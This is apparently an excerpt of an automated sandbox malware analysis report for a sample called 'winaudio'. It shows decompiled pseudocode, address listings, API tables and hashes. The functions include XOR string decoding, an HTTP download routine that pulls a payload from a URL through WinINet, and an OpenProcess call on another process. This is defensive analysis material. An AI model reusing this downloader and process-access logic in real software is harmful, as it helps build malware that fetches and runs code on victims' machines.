							_v8 = 0;
							_t167 = _v92;
							 *0x3f09c8 = _t243 + 0x18;
							if(_t167 >= 0x10) {
								_t215 = _v112;
								if(_t167 + 1 >= 0x1000) {
									_t262 = _t215 & 0x0000001f;
									if((_t215 & 0x0000001f) != 0) {
										E0037F981(_t187, _t215, _t237, _t262);
									}
									_t175 =  *(_t215 - 4);
									_t263 = _t175 - _t215;
									if(_t175 >= _t215) {
										_t175 = E0037F981(_t187, _t215, _t237, _t263);
									}
									_t216 = _t215 - _t175;
									_t264 = _t216 - 4;
									if(_t216 < 4) {
										_t175 = E0037F981(_t187, _t216, _t237, _t264);
									}
									_t265 = _t216 - 0x23;
									if(_t216 > 0x23) {
										_t175 = E0037F981(_t187, _t216, _t237, _t265);
									}
									_t215 = _t175;
								}
								L002E05B1(_t215);
								_t246 = _t246 + 4;
							}
							_t169 = _v140 + 1;
							goto L2;
							L8:
							_t214 = _t214 + 1;
						} while (_t214 < 0x20);
						_v92 = 0xf;
						_v96 = 0;
						_v112 = 0;
						if(_v56 != 0) {
							goto L12;
						} else {
							_t212 = 0;
						}
						goto L15;
					}
				}
				_t190 =  *0x3f09bc; // 0x3bf1028
				_t227 = 0x2aaaaaab * (_t190 -  *0x3f09b8) >> 0x20 >> 2;
				__eflags = (_t227 >> 0x1f) + _t227 - 1;
				if((_t227 >> 0x1f) + _t227 < 1) {
					_t138 = 0;
					__eflags = 0;
					while(1) {
						_v140 = _t138;
						__eflags = _t138 - 8;
						if(_t138 >= 8) {
							goto L77;
						}
						_t200 = 0;
						_v88 = 0;
						_t139 = _t138 << 5;
						__eflags = _t139;
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x53], xmm0");
						_v63 = 0;
						asm("movq [ebp-0x43], xmm0");
						_v59 = 0;
						_t57 = _t139 + 0x3dd008; // 0x3dd008
						_t229 = _t57;
						_v57 = 0;
						do {
							_t141 =  *(_t229 + _t200) ^ 0x0000002a;
							 *(_t244 + _t200 - 0x54) = _t141;
							__eflags = _t141 - 0x2a;
							if(_t141 != 0x2a) {
								goto L47;
							} else {
								__eflags = _t200;
								if(_t200 == 0) {
									goto L47;
								} else {
									__eflags = _t200 - 0x20;
									if(_t200 >= 0x20) {
										goto L11;
									} else {
										 *(_t244 + _t200 - 0x54) = 0;
										goto L47;
									}
								}
							}
							goto L77;
							L47:
							_t200 = _t200 + 1;
							__eflags = _t200 - 0x20;
						} while (_t200 < 0x20);
						__eflags = _v88;
						_v116 = 0xf;
						_v120 = 0;
						_v136 = 0;
						if(_v88 != 0) {
							_t201 =  &_v88;
							_t69 = _t201 + 1; // 0x1
							_t230 = _t69;
							do {
								_t142 =  *_t201;
								_t201 = _t201 + 1;
								__eflags = _t142;
							} while (_t142 != 0);
							_t202 = _t201 - _t230;
							__eflags = _t202;
						} else {
							_t202 = 0;
						}
						_push(_t202);
						_t203 =  &_v136;
						E002D0860(_t187, _t203,  &_v88);
						_v8 = 2;
						_t145 =  &_v136;
						_t242 =  *0x3f09bc; // 0x3bf1028
						__eflags = _t145 - _t242;
						if(_t145 >= _t242) {
							L59:
							__eflags = _t242 -  *0x3f09c0; // 0x3bf1040
							if(__eflags == 0) {
								_push(_t203);
								E002D7CF0(_t187, 0x3f09b8);
								_t242 =  *0x3f09bc; // 0x3bf1028
							}
							__eflags = _t242;
							if(_t242 != 0) {
								_t152 =  &_v136;
								goto L63;
							}
						} else {
							_t237 =  *0x3f09b8; // 0x3bf0f68
							__eflags = _t237 - _t145;
							if(_t237 > _t145) {
								goto L59;
							} else {
								_t209 = _t145 - _t237;
								_t159 = (0x2aaaaaab * _t209 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t209 >> 0x20 >> 2);
								_v148 = _t159;
								__eflags = _t242 -  *0x3f09c0; // 0x3bf1040
								if(__eflags == 0) {
									_push(_t209);
									E002D7CF0(_t187, 0x3f09b8);
									_t242 =  *0x3f09bc; // 0x3bf1028
									_t237 =  *0x3f09b8; // 0x3bf0f68
									_t159 = _v148;
								}
								_t152 = _t237 + (_t159 + _t159 * 2) * 8;
								__eflags = _t242;
								if(_t242 != 0) {
									L63:
									E002D0540(_t242, _t152);
									_t242 =  *0x3f09bc; // 0x3bf1028
								}
							}
						}
						_t240 = _t242 + 0x18;
						_v8 = 0;
						_t146 = _v116;
						 *0x3f09bc = _t242 + 0x18;
						__eflags = _t146 - 0x10;
						if(_t146 >= 0x10) {
							_t204 = _v136;
							__eflags = _t146 + 1 - 0x1000;
							if(_t146 + 1 >= 0x1000) {
								__eflags = _t204 & 0x0000001f;
								if(__eflags != 0) {
									E0037F981(_t187, _t204, _t237, __eflags);
								}
								_t150 =  *(_t204 - 4);
								__eflags = _t150 - _t204;
								if(__eflags >= 0) {
									_t150 = E0037F981(_t187, _t204, _t237, __eflags);
								}
								_t205 = _t204 - _t150;
								__eflags = _t205 - 4;
								if(__eflags < 0) {
									_t150 = E0037F981(_t187, _t205, _t237, __eflags);
								}
								__eflags = _t205 - 0x23;
								if(__eflags > 0) {
									_t150 = E0037F981(_t187, _t205, _t237, __eflags);
								}
								_t204 = _t150;
							}
							L002E05B1(_t204);
							_t246 = _t246 + 4;
						}
						_t138 = _v140 + 1;
					}
				}
				L77:
				_t118 =  *0x3ebb7c; // 0x0
				_t119 = _t118 + 2;
				_v152 = 0;
				__eflags = _t119 - 0x1490;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0xb4], xmm0");
				_t120 =  >  ? 0 : _t119;
				 *0x3ebb7c = _t120;
				 *0x3f0830 = _t120 & 0x00000019 | 0x000000e0;
				asm("movups [ebp-0xa4], xmm0"); // executed
				 *0x39e080( &_v184); // executed
				_t125 = _v184;
				__eflags = _t125 - 9;
				if(_t125 == 9) {
					L81:
					_t126 =  *0x3ebb54; // 0x0
					_t127 = _t126 + 2;
					__eflags = _t127 - 0x1490;
					_t128 =  >  ? 0 : _t127;
					 *0x3ebb54 =  >  ? 0 : _t127;
					_t129 = 1;
				} else {
					__eflags = _t125 - 6;
					if(_t125 == 6) {
						goto L81;
					} else {
						__eflags = _t125 - 7;
						if(_t125 == 7) {
							goto L81;
						} else {
							_t129 = 0;
						}
					}
				}
				_t194 = _v144;
				_t238 =  *0x39e0a8;
				 *((intOrPtr*)(_t194 + 0x18)) = _t129;
				_t130 =  *0x3ebb60; // 0x0
				_t131 = _t130 + 2;
				__eflags = _t131 - 0x1490;
				_t132 =  >  ? 0 : _t131;
				 *0x3ebb60 = _t132;
				_t134 = _t132 & 0x00000019 | 0x000000e0;
				__eflags = _t134;
				 *0x3f0830 = _t134;
				while(1) {
					L83:
					__eflags =  *((char*)(_t194 + 0xd));
					if( *((char*)(_t194 + 0xd)) != 0) {
						break;
					}
					__eflags =  *0x3f0835;
					if( *0x3f0835 == 0) {
						_t136 = E002D7200(_t187, 0, _t238, _t240); // executed
						__eflags = _t136;
						if(__eflags == 0) {
							 *0x3f0830 = 0x7ff7; // executed
							E002D6D60(_t187, _v144, 0, _t238, __eflags); // executed
							_t240 = 0;
							__eflags = 0;
							while(1) {
								_t194 = _v144;
								__eflags =  *((char*)(_t194 + 0xd));
								if( *((char*)(_t194 + 0xd)) != 0) {
									goto L87;
								}
								__eflags =  *0x3f0835;
								if( *0x3f0835 != 0) {
									goto L83;
								} else {
									Sleep(0x64); // executed
									_t240 = _t240 + 1;
									__eflags = _t240 - 2;
									if(_t240 < 2) {
										continue;
									} else {
										_t194 = _v144;
										goto L83;
									}
								}
								goto L87;
							}
						} else {
							 *0x3f0835 = 1;
						}
					}
					break;
				}
				L87:
				 *0x3f0830 = 0x7ff7;
				 *[fs:0x0] = _v16;
				_pop(_t241);
				__eflags = _v24 ^ _t244;
				return E002E056D(_v24 ^ _t244, 0, _t241);
			}


























































































                        0x002d7760
                        0x002d7760
                        0x002d7763
                        0x002d7765
                        0x002d7770
                        0x002d7771
                        0x002d7777
                        0x002d777c
                        0x002d777e
                        0x002d7781
                        0x002d7782
                        0x002d7783
                        0x002d7784
                        0x002d7788
                        0x002d778e
                        0x002d7791
                        0x002d7797
                        0x002d77a3
                        0x002d77be
                        0x002d77c4
                        0x002d77c6
                        0x002d77c6
                        0x002d77cf
                        0x002d77d5
                        0x002d77d7
                        0x002d77db
                        0x002d77de
                        0x002d77e1
                        0x002d77e5
                        0x002d77ec
                        0x002d77f1
                        0x002d77f7
                        0x002d77f7
                        0x002d77fd
                        0x002d7801
                        0x002d7804
                        0x002d7806
                        0x002d780c
                        0x00000000
                        0x002d7812
                        0x002d7815
                        0x002d783e
                        0x002d783e
                        0x002d7843
                        0x002d7843
                        0x002d7846
                        0x002d7850
                        0x002d7850
                        0x002d7852
                        0x002d7853
                        0x002d7853
                        0x002d7857
                        0x002d7857
                        0x002d7817
                        0x002d7817
                        0x00000000
                        0x002d7817
                        0x002d7815
                        0x002d7859
                        0x002d7859
                        0x002d785e
                        0x002d7861
                        0x002d7866
                        0x002d786a
                        0x002d786d
                        0x002d7875
                        0x002d78cd
                        0x002d78cd
                        0x002d78d3
                        0x002d78d5
                        0x002d78db
                        0x002d78e0
                        0x002d78e0
                        0x002d78e6
                        0x002d78e8
                        0x002d78ea
                        0x00000000
                        0x002d78ea
                        0x002d7877
                        0x002d7877
                        0x002d787f
                        0x00000000
                        0x002d7881
                        0x002d7888
                        0x002d7894
                        0x002d7896
                        0x002d789c
                        0x002d78a2
                        0x002d78a4
                        0x002d78aa
                        0x002d78af
                        0x002d78b5
                        0x002d78bb
                        0x002d78bb
                        0x002d78c4
                        0x002d78c9
                        0x002d78ed
                        0x002d78f0
                        0x002d78f5
                        0x002d78f5
                        0x002d78c9
                        0x002d787f
                        0x002d78fb
                        0x002d78fe
                        0x002d7902
                        0x002d7905
                        0x002d790e
                        0x002d7910
                        0x002d7919
                        0x002d791b
                        0x002d791e
                        0x002d7920
                        0x002d7920
                        0x002d7925
                        0x002d7928
                        0x002d792a
                        0x002d792c
                        0x002d792c
                        0x002d7931
                        0x002d7933
                        0x002d7936
                        0x002d7938
                        0x002d7938
                        0x002d793d
                        0x002d7940
                        0x002d7942
                        0x002d7942
                        0x002d7947
                        0x002d7947
                        0x002d794a
                        0x002d794f
                        0x002d794f
                        0x002d7958
                        0x00000000
                        0x002d781c
                        0x002d781c
                        0x002d781d
                        0x002d7826
                        0x002d782d
                        0x002d7834
                        0x002d7838
                        0x00000000
                        0x002d783a
                        0x002d783a
                        0x002d783a
                        0x00000000
                        0x002d7838
                        0x002d77cf
                        0x002d795e
                        0x002d7971
                        0x002d797b
                        0x002d797e
                        0x002d7984
                        0x002d7984
                        0x002d7986
                        0x002d7986
                        0x002d798c
                        0x002d798f
                        0x00000000
                        0x00000000
                        0x002d7995
                        0x002d7997
                        0x002d799b
                        0x002d799b
                        0x002d799e
                        0x002d79a1
                        0x002d79a5
                        0x002d79ac
                        0x002d79b1
                        0x002d79b7
                        0x002d79b7
                        0x002d79bd
                        0x002d79c1
                        0x002d79c4
                        0x002d79c6
                        0x002d79ca
                        0x002d79cc
                        0x00000000
                        0x002d79ce
                        0x002d79ce
                        0x002d79d0
                        0x00000000
                        0x002d79d2
                        0x002d79d2
                        0x002d79d5
                        0x00000000
                        0x002d79db
                        0x002d79db
                        0x00000000
                        0x002d79db
                        0x002d79d5
                        0x002d79d0
                        0x00000000
                        0x002d79e0
                        0x002d79e0
                        0x002d79e1
                        0x002d79e1
                        0x002d79e6
                        0x002d79ea
                        0x002d79f1
                        0x002d79f8
                        0x002d79ff
                        0x002d7a05
                        0x002d7a08
                        0x002d7a08
                        0x002d7a10
                        0x002d7a10
                        0x002d7a12
                        0x002d7a13
                        0x002d7a13
                        0x002d7a17
                        0x002d7a17
                        0x002d7a01
                        0x002d7a01
                        0x002d7a01
                        0x002d7a19
                        0x002d7a1e
                        0x002d7a24
                        0x002d7a29
                        0x002d7a2d
                        0x002d7a33
                        0x002d7a39
                        0x002d7a3b
                        0x002d7a93
                        0x002d7a93
                        0x002d7a99
                        0x002d7a9b
                        0x002d7aa1
                        0x002d7aa6
                        0x002d7aa6
                        0x002d7aac
                        0x002d7aae
                        0x002d7ab0
                        0x00000000
                        0x002d7ab0
                        0x002d7a3d
                        0x002d7a3d
                        0x002d7a43
                        0x002d7a45
                        0x00000000
                        0x002d7a47
                        0x002d7a4e
                        0x002d7a5a
                        0x002d7a5c
                        0x002d7a62
                        0x002d7a68
                        0x002d7a6a
                        0x002d7a70
                        0x002d7a75
                        0x002d7a7b
                        0x002d7a81
                        0x002d7a81
                        0x002d7a8a
                        0x002d7a8d
                        0x002d7a8f
                        0x002d7ab6
                        0x002d7ab9
                        0x002d7abe
                        0x002d7abe
                        0x002d7a8f
                        0x002d7a45
                        0x002d7ac4
                        0x002d7ac7
                        0x002d7acb
                        0x002d7ace
                        0x002d7ad4
                        0x002d7ad7
                        0x002d7ad9
                        0x002d7ae0
                        0x002d7ae5
                        0x002d7ae7
                        0x002d7aea
                        0x002d7aec
                        0x002d7aec
                        0x002d7af1
                        0x002d7af4
                        0x002d7af6
                        0x002d7af8
                        0x002d7af8
                        0x002d7afd
                        0x002d7aff
                        0x002d7b02
                        0x002d7b04
                        0x002d7b04
                        0x002d7b09
                        0x002d7b0c
                        0x002d7b0e
                        0x002d7b0e
                        0x002d7b13
                        0x002d7b13
                        0x002d7b16
                        0x002d7b1b
                        0x002d7b1b
                        0x002d7b24
                        0x002d7b24
                        0x002d7986
                        0x002d7b2a
                        0x002d7b2a
                        0x002d7b31
                        0x002d7b34
                        0x002d7b3a
                        0x002d7b3f
                        0x002d7b42
                        0x002d7b49
                        0x002d7b4c
                        0x002d7b59
                        0x002d7b65
                        0x002d7b6c
                        0x002d7b72
                        0x002d7b78
                        0x002d7b7c
                        0x002d7b8e
                        0x002d7b8e
                        0x002d7b95
                        0x002d7b98
                        0x002d7b9d
                        0x002d7ba0
                        0x002d7ba5
                        0x002d7b7e
                        0x002d7b7e
                        0x002d7b82
                        0x00000000
                        0x002d7b84
                        0x002d7b84
                        0x002d7b88
                        0x00000000
                        0x002d7b8a
                        0x002d7b8a
                        0x002d7b8a
                        0x002d7b88
                        0x002d7b82
                        0x002d7baa
                        0x002d7bb2
                        0x002d7bb8
                        0x002d7bbb
                        0x002d7bc0
                        0x002d7bc3
                        0x002d7bc8
                        0x002d7bcb
                        0x002d7bd3
                        0x002d7bd3
                        0x002d7bd8
                        0x002d7be0
                        0x002d7be0
                        0x002d7be0
                        0x002d7be4
                        0x00000000
                        0x00000000
                        0x002d7be6
                        0x002d7bed
                        0x002d7bef
                        0x002d7bf4
                        0x002d7bf6
                        0x002d7c2b
                        0x002d7c35
                        0x002d7c3a
                        0x002d7c3a
                        0x002d7c40
                        0x002d7c40
                        0x002d7c46
                        0x002d7c4a
                        0x00000000
                        0x00000000
                        0x002d7c4c
                        0x002d7c53
                        0x00000000
                        0x002d7c55
                        0x002d7c57
                        0x002d7c59
                        0x002d7c5a
                        0x002d7c5d
                        0x00000000
                        0x002d7c5f
                        0x002d7c5f
                        0x00000000
                        0x002d7c5f
                        0x002d7c5d
                        0x00000000
                        0x002d7c53
                        0x002d7bf8
                        0x002d7bf8
                        0x002d7bf8
                        0x002d7bf6
                        0x00000000
                        0x002d7bed
                        0x002d7bff
                        0x002d7bff
                        0x002d7c0c
                        0x002d7c15
                        0x002d7c1a
                        0x002d7c24

                        APIs
                        • GetNativeSystemInfo.KERNEL32(?,847B54EE), ref: 002D7B6C
                        • Sleep.KERNEL32(00000064), ref: 002D7C57
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: InfoNativeSleepSystem
                        • String ID:
                        • API String ID: 1726407350-0
                        • Opcode ID: 92c30b22ca692c2331092552c12fe7210859fe8702b2b9987648c8908231c623
                        • Instruction ID: 14a48050161c7f1b96d1113ea9d41208275ac2f66f06a0cf2eabab9ae2dd0366
                        • Opcode Fuzzy Hash: 92c30b22ca692c2331092552c12fe7210859fe8702b2b9987648c8908231c623
                        • Instruction Fuzzy Hash: C6E15631D2924A8FDB19DF68C8907BEB7B5AB45304F54806AD845EB392F7785E90CB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037AC40 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 233networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 73%
                        			E0037AC40(void* __ebx, signed int __ecx, void* __edi, void* __eflags, char* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v1032;
				char _v3116;
				char _v5200;
				char _v5202;
				char _v5204;
				char _v5208;
				char _v5212;
				void* _v5216;
				long _v5220;
				intOrPtr _v5232;
				char* _v5236;
				intOrPtr _v5256;
				intOrPtr _v5260;
				char* _v5264;
				char _v5276;
				void* _v5280;
				signed int _v5284;
				char* _v5288;
				intOrPtr* _v5292;
				intOrPtr _v5296;
				signed int* _v5300;
				void* __esi;
				signed int _t63;
				void* _t68;
				void* _t83;
				int _t89;
				signed int _t93;
				signed int _t94;
				intOrPtr _t96;
				short _t105;
				char _t106;
				char* _t109;
				char* _t114;
				intOrPtr _t117;
				void* _t120;
				intOrPtr* _t122;
				void* _t124;
				signed int _t129;
				intOrPtr* _t132;
				void* _t134;
				void* _t136;
				void* _t140;
				void* _t141;
				intOrPtr _t142;
				void* _t144;
				signed int _t145;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t157;

				_t126 = __ecx;
				E00397C10();
				_t63 =  *0x3e1008; // 0x847b54ee
				_v8 = _t63 ^ _t145;
				_push(__ebx);
				_t122 = _a16;
				_v5288 = _a4;
				_t140 = 0;
				_push(__edi);
				_v5296 = _a8;
				_push(0x200000);
				_v5284 = __ecx;
				_v5300 = _a12;
				_v5292 = _t122;
				_v5220 = 0;
				_t68 = E00380789(__ecx); // executed
				_t136 = _t68;
				_t147 = _t146 + 4;
				if(_t136 == 0) {
					L18:
					_pop(_t141);
					return E002E056D(_v8 ^ _t145, _t134, _t141);
				} else {
					E0037E1A0(_t136, _t136, 0, 0x200000);
					 *0x3ee038 = 0;
					E0037E1A0(_t136,  &_v5276, 0, 0x38);
					E0037E1A0(_t136,  &_v3116, 0, 0x824);
					E0037E1A0(_t136,  &_v5200, 0, 0x824);
					_t148 = _t147 + 0x30;
					_v5280 = 0x3c;
					_v5260 = 0x824;
					_v5264 =  &_v3116;
					_v5236 =  &_v5200;
					_v5232 = 0x824;
					if(InternetCrackUrlA(_v5288, 0, 0,  &_v5280) == 0) {
						L6:
						E0037E1A0(_t136, _t136, 0, 0x200000);
						_t149 = _t148 + 0xc;
						_t83 = InternetOpenA(0, 1, 0, 0, 0);
						_v5216 = _t83;
						if(_t83 == 0) {
							goto L18;
						} else {
							_t124 = InternetOpenUrlA(_t83, _v5288, 0, 0, 0x4000000, 0);
							if(_t124 != 0) {
								 *0x3ee038 = 0;
								do {
									_v5220 = 0;
									_t89 = InternetReadFile(_t124, _t136 + _t140, 0x200000 - _t140,  &_v5220);
									_t129 = _v5220;
									_t140 = _t140 + _t129;
									_v5284 = _t89;
									__eflags = _t129;
								} while (_t129 != 0);
								InternetCloseHandle(_t124);
								InternetCloseHandle(_v5216);
								__eflags = _v5284;
								if(_v5284 == 0) {
									goto L17;
								} else {
									__eflags = _t140 -  *0x3ee028; // 0x1400
									if(__eflags <= 0) {
										goto L17;
									} else {
										_t122 = _v5292;
										goto L14;
									}
								}
							} else {
								InternetCloseHandle(_v5216);
								goto L18;
							}
						}
					} else {
						E0037E1A0(_t136,  &_v1032, 0, 0x400);
						_t105 =  *((intOrPtr*)("\r\n")); // 0xa0d
						_v5204 = _t105;
						_t106 =  *0x3dce3e; // 0x0
						_v5202 = _t106;
						_v5208 = 0x3a;
						_v5212 = 0x20;
						_t109 =  &_v5204;
						_push(_t109);
						_push(_t109);
						_push("close");
						_v5216 = 0x200000;
						_push( &_v5208);
						_push("Connection");
						_push( &_v5204);
						_push(_v5264);
						_push( &_v5208);
						_push("Host");
						_push( &_v5204);
						_push("/1.1");
						_push("HTTP");
						_t114 =  &_v5212;
						_push(_t114);
						_push(_v5236);
						_push(_t114);
						E002D5BF0(_t126,  &_v1032, 0x400, "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s", "GET");
						_t132 =  &_v1032;
						_t148 = _t148 + 0x58;
						_t134 = _t132 + 1;
						do {
							_t117 =  *_t132;
							_t132 = _t132 + 1;
						} while (_t117 != 0);
						_t129 = _v5284;
						_t120 = E0037B7E0(_t122, _t134, _t136, _v5264, _v5256,  &_v1032, _t132 - _t134, _t136,  &_v5216); // executed
						if(_t120 == 0) {
							goto L6;
						} else {
							_t140 = _v5216;
							_t157 = _t140 -  *0x3ee028; // 0x1400
							if(_t157 > 0) {
								L14:
								_t93 = E0037C5A0(_t122, _t136, _v5296, _t136, _t140);
								_t149 = _t149 + 0xc;
								__eflags = _t93;
								if(_t93 == 0) {
									L17:
									L00380508(_t136);
									goto L18;
								} else {
									_t142 = _t140 -  *0x3ee028;
									 *0x3ee038 = 0;
									_push(_t142);
									 *_t122 = _t142; // executed
									_t94 = E00380789(_t129); // executed
									_t143 = _v5300;
									_t149 = _t149 + 4;
									 *_v5300 = _t94;
									__eflags = _t94;
									if(_t94 == 0) {
										goto L17;
									} else {
										E0037E1A0(_t136, _t94, 0,  *_t122);
										_t96 =  *0x3ee028; // 0x1400
										E0037E340( *_t143, _t96 + _t136,  *_t122);
										L00380508(_t136); // executed
										_pop(_t144);
										__eflags = _v8 ^ _t145;
										return E002E056D(_v8 ^ _t145, _t134, _t144);
									}
								}
							} else {
								goto L6;
							}
						}
					}
				}
			}























































                        0x0037ac40
                        0x0037ac48
                        0x0037ac4d
                        0x0037ac54
                        0x0037ac5a
                        0x0037ac5b
                        0x0037ac5f
                        0x0037ac65
                        0x0037ac6a
                        0x0037ac6b
                        0x0037ac74
                        0x0037ac79
                        0x0037ac7f
                        0x0037ac85
                        0x0037ac8b
                        0x0037ac91
                        0x0037ac96
                        0x0037ac98
                        0x0037ac9d
                        0x0037af95
                        0x0037af9b
                        0x0037afa7
                        0x0037aca3
                        0x0037acaa
                        0x0037acb7
                        0x0037acbf
                        0x0037acd1
                        0x0037ace3
                        0x0037ace8
                        0x0037aceb
                        0x0037acfb
                        0x0037ad05
                        0x0037ad11
                        0x0037ad26
                        0x0037ad38
                        0x0037ae48
                        0x0037ae50
                        0x0037ae55
                        0x0037ae62
                        0x0037ae68
                        0x0037ae70
                        0x00000000
                        0x0037ae76
                        0x0037ae8e
                        0x0037ae92
                        0x0037aea5
                        0x0037aeb0
                        0x0037aeb6
                        0x0037aece
                        0x0037aed4
                        0x0037aeda
                        0x0037aedc
                        0x0037aee2
                        0x0037aee2
                        0x0037aee7
                        0x0037aef3
                        0x0037aef9
                        0x0037af00
                        0x00000000
                        0x0037af06
                        0x0037af06
                        0x0037af0c
                        0x00000000
                        0x0037af12
                        0x0037af12
                        0x00000000
                        0x0037af12
                        0x0037af0c
                        0x0037ae94
                        0x0037ae9a
                        0x00000000
                        0x0037ae9a
                        0x0037ae92
                        0x0037ad3e
                        0x0037ad4b
                        0x0037ad50
                        0x0037ad56
                        0x0037ad5d
                        0x0037ad62
                        0x0037ad6d
                        0x0037ad79
                        0x0037ad80
                        0x0037ad86
                        0x0037ad87
                        0x0037ad88
                        0x0037ad93
                        0x0037ad9d
                        0x0037ad9e
                        0x0037ada9
                        0x0037adaa
                        0x0037adb6
                        0x0037adb7
                        0x0037adc2
                        0x0037adc3
                        0x0037adc8
                        0x0037adcd
                        0x0037add3
                        0x0037add4
                        0x0037adda
                        0x0037adf1
                        0x0037adf6
                        0x0037adfc
                        0x0037adff
                        0x0037ae02
                        0x0037ae02
                        0x0037ae04
                        0x0037ae05
                        0x0037ae14
                        0x0037ae2d
                        0x0037ae34
                        0x00000000
                        0x0037ae36
                        0x0037ae36
                        0x0037ae3c
                        0x0037ae42
                        0x0037af18
                        0x0037af20
                        0x0037af25
                        0x0037af28
                        0x0037af2a
                        0x0037af8c
                        0x0037af8d
                        0x00000000
                        0x0037af2c
                        0x0037af2c
                        0x0037af32
                        0x0037af3c
                        0x0037af3d
                        0x0037af3f
                        0x0037af44
                        0x0037af4a
                        0x0037af4d
                        0x0037af4f
                        0x0037af51
                        0x00000000
                        0x0037af53
                        0x0037af58
                        0x0037af5f
                        0x0037af69
                        0x0037af6f
                        0x0037af7a
                        0x0037af7f
                        0x0037af89
                        0x0037af89
                        0x0037af51
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0037ae42
                        0x0037ae34
                        0x0037ad38

                        APIs
                        • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 0037AD30
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0037AE62
                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000000,00000000), ref: 0037AE88
                        • InternetCloseHandle.WININET(?), ref: 0037AE9A
                        • InternetReadFile.WININET(00000000,00200000,00200000,?), ref: 0037AECE
                        • InternetCloseHandle.WININET(00000000), ref: 0037AEE7
                        • InternetCloseHandle.WININET(?), ref: 0037AEF3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Internet$CloseHandle$Open$CrackFileRead
                        • String ID: %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$/1.1$<$Connection$GET$HTTP$Host$close
                        • API String ID: 214383891-1910325879
                        • Opcode ID: 5c90bfce9494fffa1964fca97b79e442fbbddaa64e1214391b983e33625ab6ca
                        • Instruction ID: 7a92ab5eb45eaf440f77e3527e2035f6e60078350d3041cb1e9771da90ea627a
                        • Opcode Fuzzy Hash: 5c90bfce9494fffa1964fca97b79e442fbbddaa64e1214391b983e33625ab6ca
                        • Instruction Fuzzy Hash: 7F916CB5900218ABDB329F51DC85FEAB7BCAF09314F4040D5F508AB1A2D774AE88CF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D65C0 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 287COMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 74%
                        			E002D65C0(void* __ebx, void* __edi, long _a4) {
				int _v8;
				char _v16;
				signed int _v20;
				char _v280;
				char _v480;
				char _v740;
				intOrPtr _v744;
				char _v764;
				intOrPtr _v768;
				char _v788;
				int _v792;
				int _v796;
				int _v800;
				int _v804;
				void* __esi;
				void* __ebp;
				signed int _t54;
				signed int _t55;
				intOrPtr _t67;
				intOrPtr _t69;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t76;
				void* _t81;
				int _t85;
				signed int _t86;
				void* _t87;
				signed int _t88;
				signed int _t90;
				void* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				void* _t112;
				long _t113;
				signed int _t117;
				void* _t118;
				signed int _t119;
				signed int _t121;
				void* _t132;
				signed int _t146;
				signed int _t148;
				intOrPtr* _t151;
				intOrPtr* _t153;
				intOrPtr* _t155;
				void* _t172;
				void* _t173;
				void* _t177;
				int _t178;
				intOrPtr* _t179;
				long _t181;
				void* _t182;
				void* _t183;
				void* _t184;
				signed int _t187;
				void* _t188;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t193;

				_t175 = __edi;
				_t139 = __ebx;
				_push(0xffffffff);
				_push(0x39c746);
				_push( *[fs:0x0]);
				_t54 =  *0x3e1008; // 0x847b54ee
				_t55 = _t54 ^ _t187;
				_v20 = _t55;
				_push(__ebx);
				_push(__edi);
				_push(_t55);
				 *[fs:0x0] =  &_v16;
				_t181 = _a4;
				_v804 = 0;
				E0037E1A0(__edi,  &_v280, 0, 0x104);
				E0037E1A0(_t175,  &_v740, 0, 0x104);
				_t190 = _t188 - 0x314 + 0x18;
				if(_t181 < 0x64) {
					L27:
					__eflags = 0;
					L28:
					 *[fs:0x0] = _v16;
					_pop(_t182);
					return E002E056D(_v20 ^ _t187, _t172, _t182);
				}
				_t183 = OpenProcess(0x42a, 0, _t181);
				if(_t183 == 0) {
					goto L27;
				}
				_t146 =  *0x3ebb84; // 0xcc
